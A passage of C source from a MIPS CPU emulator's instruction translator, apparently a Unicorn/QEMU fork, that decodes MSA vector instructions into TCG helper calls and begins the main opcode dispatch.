gen_helper_msa_sld_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_VSHF_df: gen_helper_msa_vshf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_SUBV_df: gen_helper_msa_subv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_SUBS_U_df: gen_helper_msa_subs_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MADDV_df: gen_helper_msa_maddv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_SPLAT_df: gen_helper_msa_splat_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_SUBSUS_U_df: gen_helper_msa_subsus_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MSUBV_df: gen_helper_msa_msubv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_SUBSUU_S_df: gen_helper_msa_subsuu_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_DOTP_S_df: case OPC_DOTP_U_df: case OPC_DPADD_S_df: case OPC_DPADD_U_df: case OPC_DPSUB_S_df: case OPC_HADD_S_df: case OPC_DPSUB_U_df: case OPC_HADD_U_df: case OPC_HSUB_S_df: case OPC_HSUB_U_df: if (df == DF_BYTE) { generate_exception_end(ctx, EXCP_RI); break; } switch (MASK_MSA_3R(ctx->opcode)) { case OPC_HADD_S_df: switch (df) { case DF_HALF: gen_helper_msa_hadd_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_hadd_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_hadd_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_HADD_U_df: switch (df) { case DF_HALF: gen_helper_msa_hadd_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_hadd_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_hadd_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_HSUB_S_df: switch (df) { case DF_HALF: gen_helper_msa_hsub_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_hsub_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_hsub_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_HSUB_U_df: switch (df) { case DF_HALF: gen_helper_msa_hsub_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_hsub_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_hsub_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_DOTP_S_df: gen_helper_msa_dotp_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_DOTP_U_df: gen_helper_msa_dotp_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_DPADD_S_df: gen_helper_msa_dpadd_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_DPADD_U_df: gen_helper_msa_dpadd_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_DPSUB_S_df: gen_helper_msa_dpsub_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_DPSUB_U_df: gen_helper_msa_dpsub_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; } break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, twt); tcg_temp_free_i32(tcg_ctx, tdf); } static void gen_msa_elm_3e(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_ELM_DF3E(op) (MASK_MSA_MINOR(op) | (op & (0x3FF << 16))) uint8_t source = (ctx->opcode >> 11) & 0x1f; uint8_t dest = (ctx->opcode >> 6) & 0x1f; TCGv telm = tcg_temp_new(tcg_ctx); TCGv_i32 tsr = tcg_const_i32(tcg_ctx, source); TCGv_i32 tdt = tcg_const_i32(tcg_ctx, dest); switch (MASK_MSA_ELM_DF3E(ctx->opcode)) { case OPC_CTCMSA: gen_load_gpr(tcg_ctx, telm, source); gen_helper_msa_ctcmsa(tcg_ctx, tcg_ctx->cpu_env, telm, tdt); break; case OPC_CFCMSA: gen_helper_msa_cfcmsa(tcg_ctx, telm, tcg_ctx->cpu_env, tsr); gen_store_gpr(tcg_ctx, telm, dest); break; case OPC_MOVE_V: gen_helper_msa_move_v(tcg_ctx, tcg_ctx->cpu_env, tdt, tsr); break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, telm); tcg_temp_free_i32(tcg_ctx, tdt); tcg_temp_free_i32(tcg_ctx, tsr); } static void gen_msa_elm_df(CPUMIPSState *env, DisasContext *ctx, uint32_t df, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_ELM(op) (MASK_MSA_MINOR(op) | (op & (0xf << 22))) uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tn = tcg_const_i32(tcg_ctx, n); TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); switch (MASK_MSA_ELM(ctx->opcode)) { case OPC_SLDI_df: gen_helper_msa_sldi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); break; case OPC_SPLATI_df: gen_helper_msa_splati_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); break; case OPC_INSVE_df: gen_helper_msa_insve_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); break; case OPC_COPY_S_df: case OPC_COPY_U_df: case OPC_INSERT_df: #if !defined(TARGET_MIPS64) /* Double format valid only for MIPS64 */ if (df == DF_DOUBLE) { generate_exception_end(ctx, EXCP_RI); break; } if ((MASK_MSA_ELM(ctx->opcode) == OPC_COPY_U_df) && (df == DF_WORD)) { generate_exception_end(ctx, EXCP_RI); break; } #endif switch (MASK_MSA_ELM(ctx->opcode)) { case OPC_COPY_S_df: if (likely(wd != 0)) { switch (df) { case DF_BYTE: gen_helper_msa_copy_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; case DF_HALF: gen_helper_msa_copy_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; case DF_WORD: gen_helper_msa_copy_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; #if defined(TARGET_MIPS64) case DF_DOUBLE: gen_helper_msa_copy_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; #endif default: assert(0); } } break; case OPC_COPY_U_df: if (likely(wd != 0)) { switch (df) { case DF_BYTE: gen_helper_msa_copy_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; case DF_HALF: gen_helper_msa_copy_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; #if defined(TARGET_MIPS64) case DF_WORD: gen_helper_msa_copy_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; #endif default: assert(0); } } break; case OPC_INSERT_df: switch (df) { case DF_BYTE: gen_helper_msa_insert_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; case DF_HALF: gen_helper_msa_insert_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; case DF_WORD: gen_helper_msa_insert_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; #if defined(TARGET_MIPS64) case DF_DOUBLE: gen_helper_msa_insert_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; #endif default: assert(0); } break; } break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, tn); tcg_temp_free_i32(tcg_ctx, tdf); } static void gen_msa_elm(CPUMIPSState *env, DisasContext *ctx) { uint8_t dfn = (ctx->opcode >> 16) & 0x3f; uint32_t df = 0, n = 0; if ((dfn & 0x30) == 0x00) { n = dfn & 0x0f; df = DF_BYTE; } else if ((dfn & 0x38) == 0x20) { n = dfn & 0x07; df = DF_HALF; } else if ((dfn & 0x3c) == 0x30) { n = dfn & 0x03; df = DF_WORD; } else if ((dfn & 0x3e) == 0x38) { n = dfn & 0x01; df = DF_DOUBLE; } else if (dfn == 0x3E) { /* CTCMSA, CFCMSA, MOVE.V */ gen_msa_elm_3e(env, ctx); return; } else { generate_exception_end(ctx, EXCP_RI); return; } gen_msa_elm_df(env, ctx, df, n); } static void gen_msa_3rf(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_3RF(op) (MASK_MSA_MINOR(op) | (op & (0xf << 22))) uint8_t df = (ctx->opcode >> 21) & 0x1; uint8_t wt = (ctx->opcode >> 16) & 0x1f; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); TCGv_i32 tdf = tcg_temp_new_i32(tcg_ctx); /* adjust df value for floating-point instruction */ tcg_gen_movi_i32(tcg_ctx, tdf, df + 2); switch (MASK_MSA_3RF(ctx->opcode)) { case OPC_FCAF_df: gen_helper_msa_fcaf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FADD_df: gen_helper_msa_fadd_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCUN_df: gen_helper_msa_fcun_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSUB_df: gen_helper_msa_fsub_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCOR_df: gen_helper_msa_fcor_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCEQ_df: gen_helper_msa_fceq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FMUL_df: gen_helper_msa_fmul_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCUNE_df: gen_helper_msa_fcune_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCUEQ_df: gen_helper_msa_fcueq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FDIV_df: gen_helper_msa_fdiv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCNE_df: gen_helper_msa_fcne_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCLT_df: gen_helper_msa_fclt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FMADD_df: gen_helper_msa_fmadd_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MUL_Q_df: tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); gen_helper_msa_mul_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCULT_df: gen_helper_msa_fcult_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FMSUB_df: gen_helper_msa_fmsub_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MADD_Q_df: tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); gen_helper_msa_madd_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCLE_df: gen_helper_msa_fcle_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MSUB_Q_df: tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); gen_helper_msa_msub_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCULE_df: gen_helper_msa_fcule_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FEXP2_df: gen_helper_msa_fexp2_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSAF_df: gen_helper_msa_fsaf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FEXDO_df: gen_helper_msa_fexdo_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSUN_df: gen_helper_msa_fsun_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSOR_df: gen_helper_msa_fsor_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSEQ_df: gen_helper_msa_fseq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FTQ_df: gen_helper_msa_ftq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSUNE_df: gen_helper_msa_fsune_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSUEQ_df: gen_helper_msa_fsueq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSNE_df: gen_helper_msa_fsne_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSLT_df: gen_helper_msa_fslt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FMIN_df: gen_helper_msa_fmin_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MULR_Q_df: tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); gen_helper_msa_mulr_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSULT_df: gen_helper_msa_fsult_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FMIN_A_df: gen_helper_msa_fmin_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MADDR_Q_df: tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); gen_helper_msa_maddr_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSLE_df: gen_helper_msa_fsle_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FMAX_df: gen_helper_msa_fmax_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MSUBR_Q_df: tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); gen_helper_msa_msubr_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSULE_df: gen_helper_msa_fsule_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FMAX_A_df: gen_helper_msa_fmax_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, twt); tcg_temp_free_i32(tcg_ctx, tdf); } static void gen_msa_2r(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_2R(op) (MASK_MSA_MINOR(op) | (op & (0x1f << 21)) | \ (op & (0x7 << 18))) uint8_t wt = (ctx->opcode >> 16) & 0x1f; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; uint8_t df = (ctx->opcode >> 16) & 0x3; TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); switch (MASK_MSA_2R(ctx->opcode)) { case OPC_FILL_df: #if !defined(TARGET_MIPS64) /* Double format valid only for MIPS64 */ if (df == DF_DOUBLE) { generate_exception_end(ctx, EXCP_RI); break; } #endif gen_helper_msa_fill_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); /* trs */ break; case OPC_NLOC_df: switch (df) { case DF_BYTE: gen_helper_msa_nloc_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_HALF: gen_helper_msa_nloc_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_WORD: gen_helper_msa_nloc_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_DOUBLE: gen_helper_msa_nloc_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; } break; case OPC_NLZC_df: switch (df) { case DF_BYTE: gen_helper_msa_nlzc_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_HALF: gen_helper_msa_nlzc_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_WORD: gen_helper_msa_nlzc_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_DOUBLE: gen_helper_msa_nlzc_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; } break; case OPC_PCNT_df: switch (df) { case DF_BYTE: gen_helper_msa_pcnt_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_HALF: gen_helper_msa_pcnt_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_WORD: gen_helper_msa_pcnt_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_DOUBLE: gen_helper_msa_pcnt_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; } break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, twt); tcg_temp_free_i32(tcg_ctx, tdf); } static void gen_msa_2rf(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_2RF(op) (MASK_MSA_MINOR(op) | (op & (0x1f << 21)) | \ (op & (0xf << 17))) uint8_t wt = (ctx->opcode >> 16) & 0x1f; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; uint8_t df = (ctx->opcode >> 16) & 0x1; TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); /* adjust df value for floating-point instruction */ TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df + 2); switch (MASK_MSA_2RF(ctx->opcode)) { case OPC_FCLASS_df: gen_helper_msa_fclass_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FTRUNC_S_df: gen_helper_msa_ftrunc_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FTRUNC_U_df: gen_helper_msa_ftrunc_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FSQRT_df: gen_helper_msa_fsqrt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FRSQRT_df: gen_helper_msa_frsqrt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FRCP_df: gen_helper_msa_frcp_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FRINT_df: gen_helper_msa_frint_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FLOG2_df: gen_helper_msa_flog2_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FEXUPL_df: gen_helper_msa_fexupl_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FEXUPR_df: gen_helper_msa_fexupr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FFQL_df: gen_helper_msa_ffql_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FFQR_df: gen_helper_msa_ffqr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FTINT_S_df: gen_helper_msa_ftint_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FTINT_U_df: gen_helper_msa_ftint_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FFINT_S_df: gen_helper_msa_ffint_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FFINT_U_df: gen_helper_msa_ffint_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, twt); tcg_temp_free_i32(tcg_ctx, tdf); } static void gen_msa_vec_v(CPUMIPSState *env, DisasContext *ctx) { #define MASK_MSA_VEC(op) (MASK_MSA_MINOR(op) | (op & (0x1f << 21))) TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint8_t wt = (ctx->opcode >> 16) & 0x1f; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); switch (MASK_MSA_VEC(ctx->opcode)) { case OPC_AND_V: gen_helper_msa_and_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case OPC_OR_V: gen_helper_msa_or_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case OPC_NOR_V: gen_helper_msa_nor_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case OPC_XOR_V: gen_helper_msa_xor_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case OPC_BMNZ_V: gen_helper_msa_bmnz_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case OPC_BMZ_V: gen_helper_msa_bmz_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case OPC_BSEL_V: gen_helper_msa_bsel_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, twt); } static void gen_msa_vec(CPUMIPSState *env, DisasContext *ctx) { switch (MASK_MSA_VEC(ctx->opcode)) { case OPC_AND_V: case OPC_OR_V: case OPC_NOR_V: case OPC_XOR_V: case OPC_BMNZ_V: case OPC_BMZ_V: case OPC_BSEL_V: gen_msa_vec_v(env, ctx); break; case OPC_MSA_2R: gen_msa_2r(env, ctx); break; case OPC_MSA_2RF: gen_msa_2rf(env, ctx); break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } } static void gen_msa(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t opcode = ctx->opcode; check_insn(ctx, ASE_MSA); check_msa_access(ctx); switch (MASK_MSA_MINOR(opcode)) { case OPC_MSA_I8_00: case OPC_MSA_I8_01: case OPC_MSA_I8_02: gen_msa_i8(env, ctx); break; case OPC_MSA_I5_06: case OPC_MSA_I5_07: gen_msa_i5(env, ctx); break; case OPC_MSA_BIT_09: case OPC_MSA_BIT_0A: gen_msa_bit(env, ctx); break; case OPC_MSA_3R_0D: case OPC_MSA_3R_0E: case OPC_MSA_3R_0F: case OPC_MSA_3R_10: case OPC_MSA_3R_11: case OPC_MSA_3R_12: case OPC_MSA_3R_13: case OPC_MSA_3R_14: case OPC_MSA_3R_15: gen_msa_3r(env, ctx); break; case OPC_MSA_ELM: gen_msa_elm(env, ctx); break; case OPC_MSA_3RF_1A: case OPC_MSA_3RF_1B: case OPC_MSA_3RF_1C: gen_msa_3rf(env, ctx); break; case OPC_MSA_VEC: gen_msa_vec(env, ctx); break; case OPC_LD_B: case OPC_LD_H: case OPC_LD_W: case OPC_LD_D: case OPC_ST_B: case OPC_ST_H: case OPC_ST_W: case OPC_ST_D: { int32_t s10 = sextract32(ctx->opcode, 16, 10); uint8_t rs = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; uint8_t df = (ctx->opcode >> 0) & 0x3; TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv taddr = tcg_temp_new(tcg_ctx); gen_base_offset_addr(ctx, taddr, rs, s10 << df); switch (MASK_MSA_MINOR(opcode)) { case OPC_LD_B: gen_helper_msa_ld_b(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; case OPC_LD_H: gen_helper_msa_ld_h(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; case OPC_LD_W: gen_helper_msa_ld_w(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; case OPC_LD_D: gen_helper_msa_ld_d(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; case OPC_ST_B: gen_helper_msa_st_b(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; case OPC_ST_H: gen_helper_msa_st_h(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; case OPC_ST_W: gen_helper_msa_st_w(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; case OPC_ST_D: gen_helper_msa_st_d(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free(tcg_ctx, taddr); } break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_opc(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t offset; int rs, rt, rd, sa; uint32_t op, op1; int16_t imm; /* make sure instructions are on a word boundary */ if (ctx->base.pc_next & 0x3) { env->CP0_BadVAddr = ctx->base.pc_next; generate_exception_err(ctx, EXCP_AdEL, EXCP_INST_NOTAVAIL); return; } /* Handle blikely not taken case */ if ((ctx->hflags & MIPS_HFLAG_BMASK_BASE) == MIPS_HFLAG_BL) { TCGLabel *l1 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->bcond, 0, l1); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->hflags, ctx->hflags & ~MIPS_HFLAG_BMASK); gen_goto_tb(ctx, 1, ctx->base.pc_next + 4); gen_set_label(tcg_ctx, l1); } op = MASK_OP_MAJOR(ctx->opcode); rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 6) & 0x1f; imm = (int16_t)ctx->opcode; switch (op) { case OPC_SPECIAL: decode_opc_special(env, ctx); break; case OPC_SPECIAL2: #if defined(TARGET_MIPS64) if ((ctx->insn_flags & INSN_R5900) && (ctx->insn_flags & ASE_MMI)) { decode_mmi(env, ctx); #else if (ctx->insn_flags & ASE_MXU) { decode_opc_mxu(env, ctx); #endif } else { decode_opc_special2_legacy(env, ctx); } break; case OPC_SPECIAL3: #if defined(TARGET_MIPS64) if (ctx->insn_flags & INSN_R5900) { decode_mmi_sq(env, ctx); /* MMI_OPC_SQ */ } else { decode_opc_special3(env, ctx); } #else decode_opc_special3(env, ctx); #endif break; case OPC_REGIMM: op1 = MASK_REGIMM(ctx->opcode); switch (op1) { case OPC_BLTZL: /* REGIMM branches */ case OPC_BGEZL: case OPC_BLTZALL: case OPC_BGEZALL: check_insn(ctx, ISA_MIPS2); check_insn_opc_removed(ctx, ISA_MIPS32R6); /* Fallthrough */ case OPC_BLTZ: case OPC_BGEZ: gen_compute_branch(ctx, op1, 4, rs, -1, imm << 2, 4); break; case OPC_BLTZAL: case OPC_BGEZAL: if (ctx->insn_flags & ISA_MIPS32R6) { if (rs == 0) { /* OPC_NAL, OPC_BAL */ gen_compute_branch(ctx, op1, 4, 0, -1, imm << 2, 4); } else { generate_exception_end(ctx, EXCP_RI); } } else { gen_compute_branch(ctx, op1, 4, rs, -1, imm << 2, 4); } break; case OPC_TGEI: /* REGIMM traps */ case OPC_TGEIU: case OPC_TLTI: case OPC_TLTIU: case OPC_TEQI: case OPC_TNEI: check_insn(ctx, ISA_MIPS2); check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_trap(ctx, op1, rs, -1, imm); break; case OPC_SIGRIE: check_insn(ctx, ISA_MIPS32R6); 